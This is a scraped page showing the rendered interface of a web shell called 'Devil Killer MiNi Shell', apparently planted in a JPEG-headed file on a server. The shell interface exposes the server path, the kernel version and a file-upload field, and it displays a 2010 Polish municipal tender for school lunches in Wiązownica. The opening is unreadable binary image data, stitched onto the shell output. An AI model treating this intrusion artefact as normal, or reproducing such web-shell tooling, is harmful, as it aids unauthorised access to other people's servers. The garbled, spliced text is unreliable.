JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100805/239432-N-2010.html

<p class="kh_header"><b>Wiązownica: DOŻYWIANIE  UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM  NA TERENIE GMINY WIĄZOWNICA</b><br>
<b>Numer ogłoszenia: 239432 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOŻYWIANIE  UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM  NA TERENIE GMINY WIĄZOWNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach planowanego zadania  przewiduje się świadczenie usług w zakresie  dożywiania uczniów  szkół podstawowych i gimnazjum na terenie gminy Wiązownica, w formie   gorących posiłków.
PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA DWA ODRĘBNE ZADANIA.
ZADANIE NR 1 
Przygotowanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli.
ZADANIE NR 2 
Przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej w Ryszkowej Woli.
Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
Obiady powinny odpowiadać następującym kryteriom:
-zawartość energii - 850 kcal;
-udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
-udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
-udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ.
Sposób  przygotowywania  obiadów:
Zupy należy przygotować na wywarach jarskich (warzywnych) lub mięsnych z dodatkiem głównego składnika. Zupy na wywarach  z kości w ograniczonych ilościach.
Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, 
sporadycznie zasmażka. Przeciętna waga 1 porcji zupy - 400 g.
Drugie danie -  powinno składać  się z produktów białkowych, najlepiej pochodzenia 
zwierzęcego (mięso, ryby, drób) produktów bogatych w węglowodany złożone (ziemniaki, kasza, kluski itp.)  oraz dodatków warzywnych (surówki, warzywa gotowane).
Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki zgodnie z zalecanym  modelem żywienia o charakterze pro zdrowotnym poprzez:
-stosowanie tłuszczów roślinnych;
-ograniczone stosowanie tłuszczów zwierzęcych;
-umiarkowane stosowanie mięsa czerwonego;
-stosowanie mięsa drobiowego;
-stosowanie ryb;
-umiarkowane stosowanie jaj, cukru i soli;
-duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
Napój - w ilości 200 ml (kompot, herbata).
Obiady dowożone 1-daniowe, zamiennie w takiej samej ilości zupa o zwiększonej 
kaloryczności z pieczywem i drugie danie bez napoju. 
Zamawiający zabezpiecza naczynia  ceramiczne  dla potrzeb wydawania   posiłków  
wyłącznie  w stołówce gimnazjum w Zapałowie, natomiast w zakresie obiadów 
dowożonych do szkoły podstawowych, Wykonawca zobowiązany jest do 
zabezpieczenia termosów  oraz jednorazowych  naczyń i sztućców do wydawania posiłków oraz  środek transportu.
Długość tras dowozu posiłków wynosi:
1.	Zapałów  -  Szkoła Podstawowa w Ryszkowej Woli  - 16 km.
2.	Wiązownica - SP Manasterz-Wiązownica = 14 km. 
3.	Wiązownica - SP Radawa-Wiązownica = 16 km. 
4.	Wiązownica - SP Cetula-Wiązownica = 22 km. 
Warunki przygotowania posiłków:
W niniejszym zamówieniu przez posiłek należy rozumieć  posiłek gorący ( drugie danie)  o wartości odżywczej i kalorycznej zgodnej z wymogami obowiązującymi w żywieniu dzieci  i młodzieży. 
Posiłki będą przygotowane w pomieszczeniach kuchni, wyposażonej  w podstawowe urządzenia i sprzęt gastronomiczne, niezbędny do przygotowania i wydawania posiłków, które zostaną użyczone bezpłatnie Wykonawcy.
Wykonawca będzie pokrywał koszty zużycia gazu i energii elektrycznej. W zamian za sprzątanie  kuchni i stołówki Zamawiający zabezpieczy bezpłatnie  dostawę bieżącej wody  wraz z  odprowadzeniem ścieków.
Wykonawca  będzie ponosił pełną odpowiedzialność materialną za oddane w użyczenie  pomieszczenia i wyposażenie tych pomieszczeń.
Posiłki będą kupowane przez uczniów gimnazjum oraz szkół podstawowych, dofinansowane z budżetu  gminy.
Posiłki wydawane będą w dniach nauki szkolnej, w roku szkolnym  2009/2010.
Zamawiający zastrzega sobie możliwość zmiany liczby i  rodzajów posiłków
w zależności od zaistniałych potrzeb..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.11-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować poprzez złożenie oświadczenie, że nie prowadzi 
innej działalności (np. restauracyjnej), poza działalnością stanowiącą przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wiedzy i doświadczenia wykonawca musi przedłożyć dokumenty potwierdzające, że wykonał  co najmniej 1 usługi w zakresie  dożywiania dzieci w roku szkolnym  o wartości min. 100 000 zł. odpowiadającej przedmiotowi zamówienia -  w okresie ostatnich 3 lat, a  jeżeli  okres działalności jest krótszy, to w tym okresie z podaniem ich wartości, daty i   miejsce wykonania.
Warunek w zakresie doświadczenia w realizacji robót budowlanych, w przypadku oferty wspólnej nie zostanie uznany za spełniony, jeżeli wykonawcy wykażą się wykonaniem robót o różnym zakresie i o niższych wartościach od żądanej.   Wartość  i zakres wykonanych robót nie podlega bowiem sumowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca musi przedłożyć dokumenty potwierdzające, że dysponuje co najmniej 2 osobami  posiadającymi kwalifikacje  i uprawnienia niezbędne do realizacji   przedmiotu zamówienia ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy - zamawiający nie stawia szczegółowego warunku w  tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
-kosztorys - wycena usługi zał. Nr 2
-parafowany projekt umowy  - zał. nr 3,
-oświadczenie wykonawcy, że nie prowadzi innej formy działalności,
-pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany w umowie pod rygorem nieważności muszą być dokonane w formie pisemnej.   
2. Zamawiający zgodnie z art. 144 ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:   
2.1. zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności: wstrzymanie robót przez Zamawiającego.                             
2.2. siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;                                 
2.3. zmiana obowiązującej stawki VAT;                                                                                               
2.4. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;                                          
2.5. gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.                               
2.6 w przypadku konieczności wykonania przez Wykonawcę usług dodatkowych, na wykonanie powyższych robót zostanie zawarta odrębna umowa pod warunkiem zachowania obowiązujących przepisów Prawa zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42  II p.
Cena specyfikacji w wersji papierowej 20 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 09:00, miejsce: Urząd Gminy Wiązownica
Sekretariat Urzędu  
pok. nr 22   I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie  obiadów w stołówce szkolnej w wiązownicy w formie gorących posiłków.
Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
Obiady powinny odpowiadać następującym kryteriom:
-zawartość energii - 850 kcal;
-udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
-udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
-udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ.
Sposób  przygotowywania  obiadów:
Zupy należy przygotować na wywarach jarskich (warzywnych) lub mięsnych z dodatkiem głównego składnika. Zupy na wywarach  z kości w ograniczonych ilościach.
Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, 
sporadycznie zasmażka. Przeciętna waga 1 porcji zupy - 400 g.
Drugie danie -  powinno składać  się z produktów białkowych, najlepiej pochodzenia 
zwierzęcego (mięso, ryby, drób) produktów bogatych w węglowodany złożone (ziemniaki, kasza, kluski itp.)  oraz dodatków warzywnych (surówki, warzywa gotowane).
Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki zgodnie z zalecanym    modelem żywienia o charakterze pro zdrowotnym poprzez:
-	stosowanie tłuszczów roślinnych;
-	ograniczone stosowanie tłuszczów zwierzęcych;
-	umiarkowane stosowanie mięsa czerwonego;
-	stosowanie mięsa drobiowego;
-	stosowanie ryb;
-	umiarkowane stosowanie jaj, cukru i soli;
-	duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
Napój - w ilości 200 ml (kompot, herbata).
Obiady dowożone 1-daniowe, zamiennie w takiej samej ilości zupa o zwiększonej 
kaloryczności z pieczywem i drugie danie bez napoju. 
Zamawiający zabezpiecza naczynia  ceramiczne  dla potrzeb wydawania   posiłków  
wyłącznie  w stołówce gimnazjum w Zapałowie, natomiast w zakresie obiadów 
dowożonych do szkoły podstawowych, Wykonawca zobowiązany jest do 
zabezpieczenia termosów  oraz jednorazowych  naczyń i sztućców do wydawania 
posiłków oraz  środek transportu.
Długość tras dowozu posiłków wynosi:
1.	Wiązownica - SP Manasterz-Wiązownica = 14 km. 
2.	Wiązownica - SP Radawa-Wiązownica = 16 km. 
3.	Wiązownica - SP Cetula-Wiązownica = 22 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej 
i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej 
w Ryszkowej Woli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej w Ryszkowej Woli.
Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
Obiady powinny odpowiadać następującym kryteriom:
-zawartość energii - 850 kcal;
-udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
-udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
-udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ.
Sposób  przygotowywania  obiadów:
Zupy należy przygotować na wywarach jarskich (warzywnych) lub mięsnych z dodatkiem głównego składnika. Zupy na wywarach  z kości w ograniczonych ilościach.
Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, 
sporadycznie zasmażka. Przeciętna waga 1 porcji zupy - 400 g.
Drugie danie -  powinno składać  się z produktów białkowych, najlepiej pochodzenia 
zwierzęcego (mięso, ryby, drób) produktów bogatych w węglowodany złożone (ziemniaki,  kasza, kluski itp.)  oraz dodatków warzywnych (surówki, warzywa gotowane).

Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki zgodnie z zalecanym      modelem żywienia o charakterze pro zdrowotnym poprzez:
-stosowanie tłuszczów roślinnych;
-ograniczone stosowanie tłuszczów zwierzęcych;
-umiarkowane stosowanie mięsa czerwonego;
-stosowanie mięsa drobiowego;
-stosowanie ryb;
-umiarkowane stosowanie jaj, cukru i soli;
-duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
Napój - w ilości 200 ml (kompot, herbata).
Obiady dowożone 1-daniowe, zamiennie w takiej samej ilości zupa o zwiększonej 
kaloryczności z pieczywem i drugie danie bez napoju. 
